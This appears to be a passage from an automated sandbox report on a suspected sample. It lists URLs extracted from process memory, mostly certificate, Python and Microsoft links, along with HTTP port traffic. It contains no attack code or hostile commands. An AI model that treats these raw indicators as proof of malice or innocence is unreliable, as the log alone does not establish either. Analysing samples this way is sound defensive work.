WinHex.exe, 0000000C.00000003.1801728812.000001F51FAD3000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1800528739.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1787113599.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662729581.0000021C65B53000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659206857.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659065496.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658955506.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658826355.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659345268.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662555024.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1661029096.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662555024.0000021C65B5F000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1801496747.000001F51FAD6000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1786800951.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1796414051.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1795346506.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1801728812.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1787538248.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1800528739.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1787113599.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1801496747.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1795089608.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1838603027.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1830445848.000001E3DC935000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659730562.0000021C65B5B000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659730562.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1660478746.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1799411886.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1799216805.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1797806840.000001F51FAD2000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1797806840.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1832667722.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1835274522.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1832667722.000001E3DC93E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000004.00000002.1859895132.00000291602ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://osoft.com/pki/ceooCerAut_2010-06
Source: powershell.exe, 00000004.00000002.1749348484.0000029148308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1745831815.000001C100228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1749348484.0000029148308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.1745831815.000001C100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1749348484.00000291480E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1745831815.000001C100228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1749348484.0000029148308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659730562.0000021C65B5B000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659730562.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1660478746.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1799411886.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1799216805.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1797806840.000001F51FAD2000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1797806840.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1832667722.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1835274522.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1832667722.000001E3DC93E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659730562.0000021C65B5B000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659730562.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1660478746.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1799411886.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1799216805.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1797806840.000001F51FAD2000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1797806840.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1832667722.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1835274522.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1832667722.000001E3DC93E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659730562.0000021C65B5B000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659730562.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1660478746.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1799411886.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1799216805.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1797806840.000001F51FAD2000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1797806840.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1832667722.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1835274522.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1832667722.000001E3DC93E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: powershell.exe, 00000004.00000002.1749348484.0000029148308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1833400223.000001C17CD55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1668074546.0000029E6BF35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1663127359.0000021C65B53000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713568824.0000029E6BF2B000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713889957.0000029E6BF2C000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713338433.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000002.1716980928.0000029E6BF2C000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1802194681.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000F.00000003.1808982192.0000026E04CA1000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1839491806.000001E3DC935000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/dev/peps/pep-0205/
Source: T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667354328.0000029E6BF22000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667503469.0000029E6BF22000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000002.1717803680.0000029E6DE20000.00000004.00001000.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667503469.0000029E6BF10000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667354328.0000029E6BF10000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667582669.0000029E6BF25000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667484908.0000029E6BF24000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000F.00000003.1808072260.0000026E04CCD000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000F.00000003.1808023262.0000026E04CB9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000014.00000003.1853788787.000001C5F4DD6000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000014.00000003.1853996654.000001C5F4DE7000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000014.00000003.1853788787.000001C5F4DE7000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000014.00000003.1854109025.000001C5F4DE9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000014.00000003.1853855705.000001C5F4DE9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000014.00000003.1853996654.000001C5F4DD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/download/releases/2.3/mro/.
Source: powershell.exe, 00000002.00000002.1745831815.000001C100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1749348484.00000291480E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.1749348484.0000029148308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000004.00000002.1844983606.0000029158155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1844983606.0000029158155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1844983606.0000029158155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000033.00000003.2369019176.000001FD3C8C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000033.00000003.2369019176.000001FD3C856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000033.00000003.2369019176.000001FD3C8C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000033.00000003.2369019176.000001FD3C8A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000033.00000003.2369019176.000001FD3C8C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000004.00000002.1749348484.0000029148308000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666700013.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713707881.0000029E6BE7B000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667112966.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667988200.0000029E6BEDC000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666300025.0000029E6BEBB000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1665944774.0000029E6BED2000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666300025.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713338433.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1665944774.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666838129.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713963632.0000029E6DFF3000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666700013.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713432924.0000029E6DFF3000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666838129.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667199974.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713807345.0000029E6BEAC000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667199974.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000002.1716654117.0000029E6BEAD000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667112966.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666476945.0000029E6BEBB000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666122628.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666700013.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667112966.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667988200.0000029E6BEDC000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000002.1717160899.0000029E6D860000.00000004.00001000.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666300025.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713338433.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1665944774.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666838129.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667199974.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666122628.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000F.00000003.1807634699.0000026E04C9E000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000F.00000003.1806390027.0000026E04CA4000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000F.00000003.1807381984.0000026E04C9E000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000F.00000003.1806540594.0000026E04C9E000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000F.00000003.1806410648.0000026E04C9E000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000F.00000003.1806220123.0000026E04C9E000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000F.00000003.1806981535.0000026E04C9E000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000F.00000003.1807194586.0000026E04C9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: SystemUpdate.exe, 00000014.00000003.1853082415.000001C5F4D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666700013.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713707881.0000029E6BE7B000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667112966.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667988200.0000029E6BEDC000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666300025.0000029E6BEBB000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1665944774.0000029E6BED2000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666300025.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713338433.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1665944774.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666838129.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713963632.0000029E6DFF3000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666700013.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713432924.0000029E6DFF3000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666838129.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667199974.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713807345.0000029E6BEAC000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667199974.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000002.1716654117.0000029E6BEAD000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667112966.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666476945.0000029E6BEBB000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666122628.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666700013.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713707881.0000029E6BE7B000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667112966.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667988200.0000029E6BEDC000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666300025.0000029E6BEBB000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1665944774.0000029E6BED2000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666300025.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713338433.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1665944774.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666838129.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713963632.0000029E6DFF3000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666700013.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713432924.0000029E6DFF3000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666838129.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667199974.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1713807345.0000029E6BEAC000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667199974.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000002.1716654117.0000029E6BEAD000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1667112966.0000029E6BEB5000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666476945.0000029E6BEBB000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1666122628.0000029E6BF00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1668074546.0000029E6BF35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
Source: powershell.exe, 00000002.00000002.1809266140.000001C110073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1844983606.0000029158155000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000033.00000003.2369019176.000001FD3C8C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000033.00000003.2369019176.000001FD3C856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659730562.0000021C65B5B000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659730562.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662729581.0000021C65B53000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659206857.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659065496.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658955506.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658826355.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1660478746.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659345268.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662729581.0000021C65B5C000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662555024.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1661029096.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662555024.0000021C65B5F000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1801496747.000001F51FAD6000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1799411886.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1786800951.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1796414051.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1795346506.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1801728812.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1787538248.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1801728812.000001F51FAD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1660478746.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1799411886.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1835274522.000001E3DC935000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/H
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50227
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50227 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
